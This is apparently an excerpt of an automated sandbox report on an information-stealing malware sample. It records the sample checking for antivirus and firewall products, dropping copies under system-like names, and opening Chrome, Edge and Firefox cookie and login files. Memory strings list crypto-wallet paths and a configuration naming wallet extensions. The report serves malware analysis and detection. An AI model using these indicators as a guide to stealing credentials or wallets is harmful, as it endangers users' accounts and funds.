                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3030189423.000000001B72D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match File source: zZ1Y43bxxV.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.zZ1Y43bxxV.exe.d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: zZ1Y43bxxV.exe PID: 6164, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: wnWNWNYIxJtFiUSDRXunzX.exe PID: 7744, type: MEMORYSTR
                          Source: Yara match File source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\Public\UserOOBEBroker.exe, type: DROPPED
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\8
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: powershell.exe, 00000001.00000002.2704131588.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
